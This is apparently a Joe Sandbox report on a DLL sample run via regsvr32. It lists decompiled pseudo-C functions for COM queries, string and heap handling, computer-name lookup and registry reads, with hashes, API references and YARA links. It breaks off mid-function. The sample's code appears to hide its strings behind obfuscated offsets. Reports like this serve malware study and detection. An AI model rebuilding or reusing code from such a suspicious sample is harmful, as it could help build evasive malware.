Snapshot File: hcaresult_2_2_f40000_regsvr32.jbxd

Similarity

API ID: memset$AllocateHeapmemcpy
String ID:
API String ID: 1529149438-0
Opcode ID: 81ee5224dd5dff49c9e1b0b2cdca82cd83608858a37e435573636384fd149c0a
Instruction ID: c26fe8c728201aa7ce294e338abe55f04f67bbe6528f2109a976fb490274ea9d
Opcode Fuzzy Hash: 81ee5224dd5dff49c9e1b0b2cdca82cd83608858a37e435573636384fd149c0a
Instruction Fuzzy Hash: 05217175A00118BBDB01AF95CC41FEEBFB8AF49750F044015FD14E6242EB78DA01DBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00F45298, Relevance: 3.1, APIs: 2, Instructions: 147
serviceCOMMON

Download Yara Rule

C-Code - Quality: 38%

			E00F45298(intOrPtr _a4) {
				void* _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				void* _v28;
				char _v32;
				intOrPtr _v40;
				void* _v46;
				short _v48;
				intOrPtr _t49;
				void* _t51;
				intOrPtr* _t53;
				intOrPtr _t56;
				void* _t58;
				intOrPtr* _t59;
				intOrPtr* _t61;
				intOrPtr* _t63;
				intOrPtr* _t65;
				intOrPtr* _t67;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr* _t73;
				intOrPtr _t76;
				intOrPtr* _t79;
				short _t81;
				char* _t97;
				intOrPtr _t99;
				void* _t105;
				void* _t107;
				intOrPtr _t111;

				_t81 = 0;
				_v48 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosw");
				_t49 =  *0xf4d27c; // 0x47ea5a8
				_t4 = _t49 + 0xf4e450; // 0x57389f8
				_t5 = _t49 + 0xf4e440; // 0x9ba05972
				_t51 =  *0xf4d15c(_t5, 0, 4, _t4,  &_v20); // executed
				_t105 = _t51;
				if(_t105 >= 0) {
					_t53 = _v20;
					_push( &_v12);
					_push(1);
					_push( &_v32);
					_push(8);
					_t97 =  &_v48;
					_push(_t97);
					_push(_t97);
					_push(_t53); // executed
					if( *((intOrPtr*)( *_t53 + 0x3c))() == 0) {
						_t56 =  *0xf4d27c; // 0x47ea5a8
						_t30 = _t56 + 0xf4e430; // 0x57389d8
						_t31 = _t56 + 0xf4e460; // 0x4c96be40
						_t58 =  *0xf4d0f8(_v12, _t31, _t30,  &_v24); // executed
						_t105 = _t58;
						_t59 = _v12;
						 *((intOrPtr*)( *_t59 + 8))(_t59);
						goto L11;
					} else {
						_t71 = _v20;
						_v16 = 0;
						_t105 =  *((intOrPtr*)( *_t71 + 0x1c))(_t71,  &_v16);
						if(_t105 >= 0) {
							_t111 = _v16;
							if(_t111 == 0) {
								_t105 = 0x80004005;
								goto L11;
							} else {
								if(_t111 <= 0) {
									L11:
									if(_t105 >= 0) {
										goto L12;
									}
								} else {
									do {
										_t73 = _v20;
										_v48 = 3;
										_v40 = _t81;
										_t107 = _t107 - 0x10;
										asm("movsd");
										asm("movsd");
										asm("movsd");
										asm("movsd");
										_t105 =  *((intOrPtr*)( *_t73 + 0x20))(_t73,  &_v12);
										if(_t105 < 0) {
											goto L7;
										} else {
											_t76 =  *0xf4d27c; // 0x47ea5a8
											_t23 = _t76 + 0xf4e430; // 0x57389d8
											_t24 = _t76 + 0xf4e460; // 0x4c96be40
											_t105 =  *0xf4d0f8(_v12, _t24, _t23,  &_v24);
											_t79 = _v12;
											 *((intOrPtr*)( *_t79 + 8))(_t79);
											if(_t105 >= 0) {
												L12:
												_t63 = _v24;
												_t105 =  *((intOrPtr*)( *_t63 + 0x3c))(_t63,  &_v28);
												if(_t105 >= 0) {
													_t99 =  *0xf4d27c; // 0x47ea5a8
													_t67 = _v28;
													_t40 = _t99 + 0xf4e420; // 0x214e3
													_t105 =  *((intOrPtr*)( *_t67))(_t67, _t40, _a4);
													_t69 = _v28;
													 *((intOrPtr*)( *_t69 + 8))(_t69);
												}
												_t65 = _v24;
												 *((intOrPtr*)( *_t65 + 8))(_t65);
											} else {
												goto L7;
											}
										}
										goto L15;
										L7:
										_t81 = _t81 + 1;
									} while (_t81 < _v16);
									goto L11;
								}
							}
						}
					}
					L15:
					_t61 = _v20;
					 *((intOrPtr*)( *_t61 + 8))(_t61);
				}
				return _t105;
			}

0x00f452a3
0x00f452a5
0x00f452ac
0x00f452ad
0x00f452ae
0x00f452af
0x00f452b5
0x00f452ba
0x00f452c4
0x00f452cb
0x00f452d1
0x00f452d5
0x00f452db
0x00f452e3
0x00f452e4
0x00f452e9
0x00f452ea
0x00f452ec
0x00f452ef
0x00f452f0
0x00f452f1
0x00f452f7
0x00f4538c
0x00f45391
0x00f45398
0x00f453a2
0x00f453a8
0x00f453aa
0x00f453b0
0x00000000
0x00f452fd
0x00f452fd
0x00f45304
0x00f4530d
0x00f45311
0x00f45317
0x00f4531a
0x00f45381
0x00000000
0x00f4531c
0x00f4531c
0x00f453b3
0x00f453b5
0x00000000
0x00000000
0x00f45322
0x00f45322
0x00f45322
0x00f45329
0x00f4532f
0x00f45334
0x00f4533c
0x00f4533d
0x00f4533e
0x00f45340
0x00f45344
0x00f45348
0x00000000
0x00f4534a
0x00f4534e
0x00f45353
0x00f4535a
0x00f4536a
0x00f4536c
0x00f45372
0x00f45377
0x00f453b7
0x00f453b7
0x00f453c4
0x00f453c8
0x00f453cd
0x00f453d3
0x00f453d8
0x00f453e2
0x00f453e4
0x00f453ea
0x00f453ea
0x00f453ed
0x00f453f3
0x00000000
0x00000000
0x00000000
0x00f45377
0x00000000
0x00f45379
0x00f45379
0x00f4537a
0x00000000
0x00f4537f
0x00f4531c
0x00f4531a
0x00f45311
0x00f453f6
0x00f453f6
0x00f453fc
0x00f453fc
0x00f45405

APIs

IUnknown_QueryService.SHLWAPI(00000000,4C96BE40,057389D8,00F4A582,?,?,?,?,?,?,?,?,?,?,?,00F4A582), ref: 00F45364
IUnknown_QueryService.SHLWAPI(00000000,4C96BE40,057389D8,00F4A582,?,?,?,?,?,?,?,00F4A582,00000000,00000000,00000000,006D0063), ref: 00F453A2

Memory Dump Source

Source File: 00000002.00000002.1030677795.0000000000F41000.00000020.00000001.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000002.00000002.1030663345.0000000000F40000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.1030698611.0000000000F4C000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.1030711367.0000000000F4D000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.1030724379.0000000000F4F000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f40000_regsvr32.jbxd

Similarity

API ID: QueryServiceUnknown_
String ID:
API String ID: 2042360610-0
Opcode ID: 08aa5f0a9b24cce49a6b85ca98bf466ddeb9c999adeabbc2ee9997c5f731e076
Instruction ID: 882a66cfcd8648a02d182b92abe5c18b1c29596235687843a332b128de83749a
Opcode Fuzzy Hash: 08aa5f0a9b24cce49a6b85ca98bf466ddeb9c999adeabbc2ee9997c5f731e076
Instruction Fuzzy Hash: FE515D76D00519AFCB00DFA8C888DBEB7B9FF49714B048998ED15EB221D771AD05DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00F489FA, Relevance: 3.1, APIs: 2, Instructions: 112
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E00F489FA(void* __ecx, void* _a4, intOrPtr _a8, char _a12, intOrPtr _a16, char _a20, intOrPtr _a24, intOrPtr* _a28) {
				void* _v8;
				void* __esi;
				intOrPtr* _t35;
				void* _t40;
				intOrPtr* _t41;
				intOrPtr* _t43;
				intOrPtr* _t45;
				intOrPtr* _t50;
				intOrPtr* _t52;
				void* _t54;
				intOrPtr* _t55;
				intOrPtr* _t57;
				intOrPtr* _t61;
				intOrPtr* _t65;
				intOrPtr _t68;
				void* _t72;
				void* _t75;
				void* _t76;

				_t55 = _a4;
				_t35 =  *((intOrPtr*)(_t55 + 4));
				_a4 = 0;
				_t76 =  *((intOrPtr*)( *_t35 + 0x4c))(_t35, _a16, 0,  &_v8, 0, _t72, _t75, _t54, __ecx, __ecx);
				if(_t76 < 0) {
					L18:
					return _t76;
				}
				_t40 = E00F484F5(_v8, _a8, _a12, _a20,  &_a20,  &_a12); // executed
				_t76 = _t40;
				if(_t76 >= 0) {
					_t61 = _a28;
					if(_t61 != 0 &&  *_t61 != 0) {
						_t52 = _v8;
						_t76 =  *((intOrPtr*)( *_t52 + 0x14))(_t52, _a24, 0, _t61, 0);
					}
					if(_t76 >= 0) {
						_t43 =  *_t55;
						_t68 =  *0xf4d27c; // 0x47ea5a8
						_t20 = _t68 + 0xf4e1fc; // 0x740053
						_t76 =  *((intOrPtr*)( *_t43 + 0x60))(_t43, _t20, _a16, 0, 0, _v8,  &_a4, 0);
						if(_t76 >= 0) {
							_t76 = E00F4494F(_a4);
							if(_t76 >= 0) {
								_t65 = _a28;
								if(_t65 != 0 &&  *_t65 == 0) {
									_t50 = _a4;
									_t76 =  *((intOrPtr*)( *_t50 + 0x10))(_t50, _a24, 0, _t65, 0, 0);
								}
							}
						}
						_t45 = _a4;
						if(_t45 != 0) {
							 *((intOrPtr*)( *_t45 + 8))(_t45);
						}
						_t57 = __imp__#6;
						if(_a20 != 0) {
							 *_t57(_a20);
						}
						if(_a12 != 0) {
							 *_t57(_a12);
						}
					}
				}
				_t41 = _v8;
				 *((intOrPtr*)( *_t41 + 8))(_t41);
				goto L18;
			}

0x00f48a00
0x00f48a03
0x00f48a13
0x00f48a1c
0x00f48a20
0x00f48aee
0x00f48af4
0x00f48af4
0x00f48a3a
0x00f48a3f
0x00f48a43
0x00f48a49
0x00f48a4e
0x00f48a55
0x00f48a64
0x00f48a64
0x00f48a68
0x00f48a6a
0x00f48a76
0x00f48a81
0x00f48a8c
0x00f48a90
0x00f48a9a
0x00f48a9e
0x00f48aa0
0x00f48aa5
0x00f48aac
0x00f48abc
0x00f48abc
0x00f48aa5
0x00f48a9e
0x00f48abe
0x00f48ac3
0x00f48ac8
0x00f48ac8
0x00f48ace
0x00f48ad4
0x00f48ad9
0x00f48ad9
0x00f48ade
0x00f48ae3
0x00f48ae3
0x00f48ade
0x00f48a68
0x00f48ae5
0x00f48aeb
0x00000000

APIs

Part of subcall function 00F484F5: SysAllocString.OLEAUT32(80000002), ref: 00F4854C
Part of subcall function 00F484F5: SysFreeString.OLEAUT32(00000000), ref: 00F485B1

SysFreeString.OLEAUT32(?), ref: 00F48AD9
SysFreeString.OLEAUT32(00F49CAA), ref: 00F48AE3

Memory Dump Source

Source File: 00000002.00000002.1030677795.0000000000F41000.00000020.00000001.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000002.00000002.1030663345.0000000000F40000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.1030698611.0000000000F4C000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.1030711367.0000000000F4D000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.1030724379.0000000000F4F000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f40000_regsvr32.jbxd

Similarity

API ID: String$Free$Alloc
String ID:
API String ID: 986138563-0
Opcode ID: 098b1e36febeebc50edb572481e81980d932dfa1c4b70616309d4ba2f8d0e29b
Instruction ID: 88c3e2ca9b333249e58a5e43919a72a886f38ea1332af7fd40e12e4b9b68c92a
Opcode Fuzzy Hash: 098b1e36febeebc50edb572481e81980d932dfa1c4b70616309d4ba2f8d0e29b
Instruction Fuzzy Hash: AE316B72900108BFCB21DF58CC88C9FBB79FBC97907144659FC059B210EA75AD52EBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00F45037, Relevance: 3.1, APIs: 2, Instructions: 62
COMMON

Download Yara Rule

C-Code - Quality: 50%

			E00F45037(intOrPtr* __eax, intOrPtr _a4) {
				void* _v8;
				void* _v12;
				void* _v16;
				intOrPtr* _t22;
				void* _t23;
				intOrPtr* _t24;
				intOrPtr* _t26;
				intOrPtr* _t28;
				intOrPtr* _t30;
				void* _t31;
				intOrPtr* _t32;
				intOrPtr _t42;
				intOrPtr _t45;
				intOrPtr _t48;
				void* _t51;

				_push( &_v16);
				_t42 =  *0xf4d27c; // 0x47ea5a8
				_t2 = _t42 + 0xf4e470; // 0x20400
				_push(0);
				_push(__eax);
				_t51 =  *((intOrPtr*)( *__eax + 0x3c))();
				if(_t51 >= 0) {
					_t22 = _v16;
					_t45 =  *0xf4d27c; // 0x47ea5a8
					_t6 = _t45 + 0xf4e490; // 0xe7a1af80
					_t23 =  *((intOrPtr*)( *_t22))(_t22, _t6,  &_v12); // executed
					_t51 = _t23;
					if(_t51 >= 0) {
						_t26 = _v12;
						_t51 =  *((intOrPtr*)( *_t26 + 0x1c))(_t26,  &_v8);
						if(_t51 >= 0) {
							_t48 =  *0xf4d27c; // 0x47ea5a8
							_t30 = _v8;
							_t12 = _t48 + 0xf4e480; // 0xa4c6892c
							_t31 =  *((intOrPtr*)( *_t30))(_t30, _t12, _a4); // executed
							_t51 = _t31;
							_t32 = _v8;
							 *((intOrPtr*)( *_t32 + 8))(_t32);
						}
						_t28 = _v12;
						 *((intOrPtr*)( *_t28 + 8))(_t28);
					}
					_t24 = _v16;
					 *((intOrPtr*)( *_t24 + 8))(_t24);
				}
				return _t51;
			}

0x00f45043
0x00f45044
0x00f4504a
0x00f45051
0x00f45053
0x00f45057
0x00f4505b
0x00f4505d
0x00f45066
0x00f4506c
0x00f45074
0x00f45076
0x00f4507a
0x00f4507c
0x00f45089
0x00f4508d
0x00f45092
0x00f45098
0x00f4509d
0x00f450a5
0x00f450a7
0x00f450a9
0x00f450af
0x00f450af
0x00f450b2
0x00f450b8
0x00f450b8
0x00f450bb
0x00f450c1
0x00f450c1
0x00f450c8

APIs

IUnknown_QueryInterface_Proxy.RPCRT4(?,E7A1AF80,?), ref: 00F45074
IUnknown_QueryInterface_Proxy.RPCRT4(?,A4C6892C,?), ref: 00F450A5

Memory Dump Source

Source File: 00000002.00000002.1030677795.0000000000F41000.00000020.00000001.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000002.00000002.1030663345.0000000000F40000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.1030698611.0000000000F4C000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.1030711367.0000000000F4D000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.1030724379.0000000000F4F000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f40000_regsvr32.jbxd

Similarity

API ID: Interface_ProxyQueryUnknown_
String ID:
API String ID: 2522245112-0
Opcode ID: a041b48a453847450a3ed4d8bbe36901f267bcdc65d1bf7dff5157a38083309b
Instruction ID: 97802d4c9a547c39fcb9345e2c78e86013d230f3c7d3b9b94fbabadbf9fb8206
Opcode Fuzzy Hash: a041b48a453847450a3ed4d8bbe36901f267bcdc65d1bf7dff5157a38083309b
Instruction Fuzzy Hash: 1221547990161AEFCB10DBA4C884D5AB779FF89704B148688ED05DB325D771EE01DBE0

Uniqueness

Uniqueness Score: -1.00%

Function 00F48F24, Relevance: 3.1, APIs: 2, Instructions: 51COMMON

Download Yara Rule

APIs

SafeArrayCreate.OLEAUT32(00000011,00000001,80000002), ref: 00F48F4C

Part of subcall function 00F489FA: SysFreeString.OLEAUT32(?), ref: 00F48AD9

SafeArrayDestroy.OLEAUT32(?), ref: 00F48F99

Memory Dump Source

Source File: 00000002.00000002.1030677795.0000000000F41000.00000020.00000001.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000002.00000002.1030663345.0000000000F40000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.1030698611.0000000000F4C000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.1030711367.0000000000F4D000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.1030724379.0000000000F4F000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f40000_regsvr32.jbxd

Similarity

API ID: ArraySafe$CreateDestroyFreeString
String ID:
API String ID: 3098518882-0
Opcode ID: 1eb1f88a3ac4029356591818fb5e5300e07b91a2a84fabfc3d10f3638941939c
Instruction ID: 9fc496afcb3168d4337f9f528cfb6a9778ef911218fa2e71faea7c63e67fe40d
Opcode Fuzzy Hash: 1eb1f88a3ac4029356591818fb5e5300e07b91a2a84fabfc3d10f3638941939c
Instruction Fuzzy Hash: D5113C76900109BFDB11DFA8CC45AAEBBB9FF18350F008065FE01E7161E7749A55ABA1

Uniqueness

Uniqueness Score: -1.00%

Function 00F4A412, Relevance: 3.0, APIs: 2, Instructions: 42memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(00F48C69), ref: 00F4A42C

Part of subcall function 00F489FA: SysFreeString.OLEAUT32(?), ref: 00F48AD9

SysFreeString.OLEAUT32(00000000), ref: 00F4A46C

Memory Dump Source

Source File: 00000002.00000002.1030677795.0000000000F41000.00000020.00000001.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000002.00000002.1030663345.0000000000F40000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.1030698611.0000000000F4C000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.1030711367.0000000000F4D000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.1030724379.0000000000F4F000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f40000_regsvr32.jbxd

Similarity

API ID: String$Free$Alloc
String ID:
API String ID: 986138563-0
Opcode ID: d337546e1b6c9fa1c308b7e7f0037bb0496acb7cd554d0505302698c9887f8e2
Instruction ID: 23edec011b67bef68f2ee30cef968c04f4aa0fd7734d67d46c76db524b0873fe
Opcode Fuzzy Hash: d337546e1b6c9fa1c308b7e7f0037bb0496acb7cd554d0505302698c9887f8e2
Instruction Fuzzy Hash: 4F01627690150EFBCB11DFA8CC089AF7BB8FF58310B014061FE05E6120E7749A15EBA2

Uniqueness

Uniqueness Score: -1.00%

Function 00F4570D, Relevance: 3.0, APIs: 2, Instructions: 40
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E00F4570D(void* __ecx) {
				signed int _v8;
				void* _t15;
				void* _t19;
				void* _t20;
				void* _t22;
				intOrPtr* _t23;

				_t23 = __imp__;
				_t20 = 0;
				_v8 = _v8 & 0;
				 *_t23(3, 0,  &_v8, _t19, _t22, __ecx); // executed
				_t10 = _v8;
				if(_v8 != 0) {
					_t20 = E00F43727(_t10 + 1);
					if(_t20 != 0) {
						_t15 =  *_t23(3, _t20,  &_v8); // executed
						if(_t15 != 0) {
							 *((char*)(_v8 + _t20)) = 0;
						} else {
							E00F46EF8(_t20);
							_t20 = 0;
						}
					}
				}
				return _t20;
			}

0x00f45712
0x00f4571d
0x00f4571f
0x00f45725
0x00f45727
0x00f4572c
0x00f45735
0x00f45739
0x00f45742
0x00f45746
0x00f45755
0x00f45748
0x00f45749
0x00f4574e
0x00f4574e
0x00f45746
0x00f45739
0x00f4575e

APIs

GetComputerNameExA.KERNELBASE(00000003,00000000,00F4975B,73BCF710,00000000,?,?,00F4975B), ref: 00F45725

Part of subcall function 00F43727: RtlAllocateHeap.NTDLL(00000000,00000000,00F443D1), ref: 00F43733

GetComputerNameExA.KERNELBASE(00000003,00000000,00F4975B,00F4975C,?,?,00F4975B), ref: 00F45742

Part of subcall function 00F46EF8: RtlFreeHeap.NTDLL(00000000,00000000,00F44499,00000000,?,?,00000000), ref: 00F46F04

Memory Dump Source

Source File: 00000002.00000002.1030677795.0000000000F41000.00000020.00000001.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000002.00000002.1030663345.0000000000F40000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.1030698611.0000000000F4C000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.1030711367.0000000000F4D000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.1030724379.0000000000F4F000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f40000_regsvr32.jbxd

Similarity

API ID: ComputerHeapName$AllocateFree
String ID:
API String ID: 187446995-0
Opcode ID: eedb3733819fd598ef96da7ed5308b9c0d1922f10faa5f97ae2a604bf9ecdf85
Instruction ID: c09ba4e51ffb8b08754003344105fce0d6d9f40a45403f92373ccce28a9543f7
Opcode Fuzzy Hash: eedb3733819fd598ef96da7ed5308b9c0d1922f10faa5f97ae2a604bf9ecdf85
Instruction Fuzzy Hash: A5F03066A0054DFBE711E69A9D01FAF7BACDBC5B50F210069AD04D3142EA74DE01A660

Uniqueness

Uniqueness Score: -1.00%

Function 00F47123, Relevance: 3.0, APIs: 2, Instructions: 35
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00F47123(WCHAR* _a4) {
				void* __edi;
				intOrPtr _t11;
				intOrPtr _t14;
				void* _t16;
				void* _t18;
				WCHAR* _t20;

				_t20 = E00F43727(lstrlenW(_a4) + _t7 + 0x5c);
				if(_t20 == 0) {
					_t18 = 8;
				} else {
					_t11 =  *0xf4d27c; // 0x47ea5a8
					_t5 = _t11 + 0xf4ea68; // 0x43002f
					wsprintfW(_t20, _t5, 5, _a4);
					_t14 =  *0xf4d27c; // 0x47ea5a8
					_t6 = _t14 + 0xf4e918; // 0x6d0063
					_t16 = E00F43D90(0, _t6, _t20, 0); // executed
					_t18 = _t16;
					E00F46EF8(_t20);
				}
				return _t18;
			}

0x00f47139
0x00f4713d
0x00f4717d
0x00f4713f
0x00f47143
0x00f4714a
0x00f47152
0x00f47158
0x00f47163
0x00f4716c
0x00f47172
0x00f47174
0x00f47174
0x00f47182

APIs

lstrlenW.KERNEL32(73BCF710,00000000,00000001,00F4380A,00000005,?,73BCF710,00000000,73BCF730,?,?,?,00F49F8C,?,00000001,?), ref: 00F47129

Part of subcall function 00F43727: RtlAllocateHeap.NTDLL(00000000,00000000,00F443D1), ref: 00F43733

wsprintfW.USER32 ref: 00F47152

Part of subcall function 00F43D90: memset.NTDLL ref: 00F43DB3
Part of subcall function 00F43D90: GetLastError.KERNEL32 ref: 00F43DFF

Part of subcall function 00F46EF8: RtlFreeHeap.NTDLL(00000000,00000000,00F44499,00000000,?,?,00000000), ref: 00F46F04

Memory Dump Source

Source File: 00000002.00000002.1030677795.0000000000F41000.00000020.00000001.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000002.00000002.1030663345.0000000000F40000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.1030698611.0000000000F4C000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.1030711367.0000000000F4D000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.1030724379.0000000000F4F000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f40000_regsvr32.jbxd

Similarity

API ID: Heap$AllocateErrorFreeLastlstrlenmemsetwsprintf
String ID:
API String ID: 1672627171-0
Opcode ID: f78e9e9e547ad76eb753ac3259c618975dc0f80ae103e8de6c157c5de0279a65
Instruction ID: b20c126ed8aeb20bb03045b2a89644883879143db98a0b5e3c984b473af2067f
Opcode Fuzzy Hash: f78e9e9e547ad76eb753ac3259c618975dc0f80ae103e8de6c157c5de0279a65
Instruction Fuzzy Hash: 1FF0B4766012186BD321AB78EC45E5BBBADEFC6710F014062FD44C7162C734D605F7A5

Uniqueness

Uniqueness Score: -1.00%

Function 00F48095, Relevance: 3.0, APIs: 2, Instructions: 26
COMMON

Download Yara Rule

C-Code - Quality: 100%

			_entry_(intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _t4;
				void* _t10;
				void* _t11;
				void* _t12;
				void* _t14;

				_t14 = 1;
				_t4 = _a8;
				if(_t4 == 0) {
					if(InterlockedDecrement(0xf4d23c) == 0) {
						E00F49426();
					}
				} else {
					if(_t4 == 1 && InterlockedIncrement(0xf4d23c) == 1) {
						_t10 = E00F4947A(_t11, _t12, _a4); // executed
						if(_t10 != 0) {
							_t14 = 0;
						}
					}
				}
				return _t14;
			}

0x00f4809c
0x00f4809d
0x00f480a0
0x00f480d2
0x00f480d4
0x00f480d4
0x00f480a2
0x00f480a3
0x00f480b8
0x00f480bf
0x00f480c1
0x00f480c1
0x00f480bf
0x00f480a3
0x00f480dc

APIs

InterlockedIncrement.KERNEL32(00F4D23C), ref: 00F480AA

Part of subcall function 00F4947A: HeapCreate.KERNELBASE(00000000,00400000,00000000,?,00000001,?,?,?,00F480BD,?), ref: 00F4948D

InterlockedDecrement.KERNEL32(00F4D23C), ref: 00F480CA

Memory Dump Source

Source File: 00000002.00000002.1030677795.0000000000F41000.00000020.00000001.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000002.00000002.1030663345.0000000000F40000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.1030698611.0000000000F4C000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.1030711367.0000000000F4D000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.1030724379.0000000000F4F000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f40000_regsvr32.jbxd

Similarity

API ID: Interlocked$CreateDecrementHeapIncrement
String ID:
API String ID: 3834848776-0
Opcode ID: ca8f8f55bd53a1aad6ee620e48490eab44c8613b90aa389e13951e107dc7d64f
Instruction ID: 3b713d8b1ff3dbfb05921f0b0172cee545cb3fb080830bdf9317a22ba17bf5b4
Opcode Fuzzy Hash: ca8f8f55bd53a1aad6ee620e48490eab44c8613b90aa389e13951e107dc7d64f
Instruction Fuzzy Hash: 3DE04F397641259386725B7CDC04B5F7ED0AF21BE0F019414FC83D10A0DE90CC56B2D1

Uniqueness

Uniqueness Score: -1.00%

Function 00F482C4, Relevance: 1.6, APIs: 1, Instructions: 79
registryCOMMON

Download Yara Rule

C-Code - Quality: 46%

			E00F482C4(char _a4, void* _a8, char _a12, intOrPtr _a16, intOrPtr* _a20, intOrPtr* _a24) {
				void* _t25;
				intOrPtr* _t39;
				intOrPtr _t42;
				void* _t43;
				intOrPtr* _t44;

				if(_a4 != 0) {
					_t25 = E00F4A30A(_a4, _a8, _a12, _a16, _a20, _a24); // executed
					_t43 = _t25;
				} else {
					_t43 =  *0xf4d0d4(_a8, _a12,  &_a8);
					if(_t43 == 0) {
						_t44 =  *0xf4d0d0; // 0xf4abfa
						 *_t44(_a8, _a16, 0,  &_a4, 0,  &_a12);
						if(_a12 == 0) {
							_t43 = 0xe8;
						} else {
							_t42 = E00F43727(_a12);
							if(_t42 == 0) {
								_t43 = 8;
							} else {
								_t43 =  *_t44(_a8, _a16, 0,  &_a4, _t42,  &_a12);
								if(_t43 != 0) {
									E00F46EF8(_t42);
								} else {
									 *_a20 = _t42;
									_t39 = _a24;
									if(_t39 != 0) {
										 *_t39 = _a12;
									}
								}
							}
						}
						RegCloseKey(_a8);
					}
				}
				return _t43;
			}

0x00f482d0
0x00f48375
0x00f4837a
0x00f482d6
0x00f482e6
0x00f482ea
0x00f482f0
0x00f48306
0x00f4830b
0x00f48353
0x00f4830d
0x00f48315
0x00f48319
0x00f48350
0x00f4831b
0x00f4832d
0x00f48331
0x00f48347
0x00f48333
0x00f48336
0x00f48338
0x00f4833d
0x00f48342
0x00f48342
0x00f4833d
0x00f48331
0x00f48319
0x00f4835b
0x00f4835b
0x00f482ea
0x00f48383

APIs

RegCloseKey.ADVAPI32(80000002,?,00F49CE1,3D00F4C0,80000002,00F437CC,00000000,00F437CC,?,65696C43,80000002,00000000,?), ref: 00F4835B

Part of subcall function 00F43727: RtlAllocateHeap.NTDLL(00000000,00000000,00F443D1), ref: 00F43733

Memory Dump Source

Source File: 00000002.00000002.1030677795.0000000000F41000.00000020.00000001.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000002.00000002.1030663345.0000000000F40000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.1030698611.0000000000F4C000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.1030711367.0000000000F4D000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.1030724379.0000000000F4F000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f40000_regsvr32.jbxd

Similarity

API ID: AllocateCloseHeap
String ID:
API String ID: 3565931908-0
Opcode ID: 8a9dcab77b707d9c68da3ceefbefa6bc6d7c256a1b6ea57152a9cf47c742f846
Instruction ID: 9c785607ee514cb3afedc3a153508076c956162e3c5eb395eaa6a448f29bffdb
Opcode Fuzzy Hash: 8a9dcab77b707d9c68da3ceefbefa6bc6d7c256a1b6ea57152a9cf47c742f846
Instruction Fuzzy Hash: 5721257740025DAFDF119F94DC808BE7FA9FB097A0B148426FE1497120DB329D62ABA0

Uniqueness

Uniqueness Score: -1.00%

Function 00F47185, Relevance: 1.6, APIs: 1, Instructions: 75
memoryCOMMON

Download Yara Rule

C-Code - Quality: 92%

			E00F47185(signed int __eax, void* __ecx, intOrPtr* _a4, void** _a8, intOrPtr* _a12) {
				signed int _v5;
				signed int _v12;
				void* _t32;
				signed int _t37;
				signed int _t39;
				signed char _t45;
				void* _t49;
				char* _t51;
				signed int _t65;
				signed int _t66;
				signed int _t69;

				_v12 = _v12 & 0x00000000;
				_t69 = __eax;
				_t32 = RtlAllocateHeap( *0xf4d238, 0, __eax << 2); // executed
				_t49 = _t32;
				if(_t49 == 0) {
					_v12 = 8;
				} else {
					 *_a8 = _t49;
					do {
						_t45 =  *_a4;
						asm("cdq");
						_t65 = 0x64;
						_t37 = (_t45 & 0x000000ff) / _t65;
						_v5 = _t37;
						if(_t37 != 0) {
							 *_t49 = _t37 + 0x30;
							_t49 = _t49 + 1;
							_t45 = _t45 + _t37 * 0x9c;
						}
						asm("cdq");
						_t66 = 0xa;
						_t39 = (_t45 & 0x000000ff) / _t66;
						if(_t39 != 0 || _v5 != _t39) {
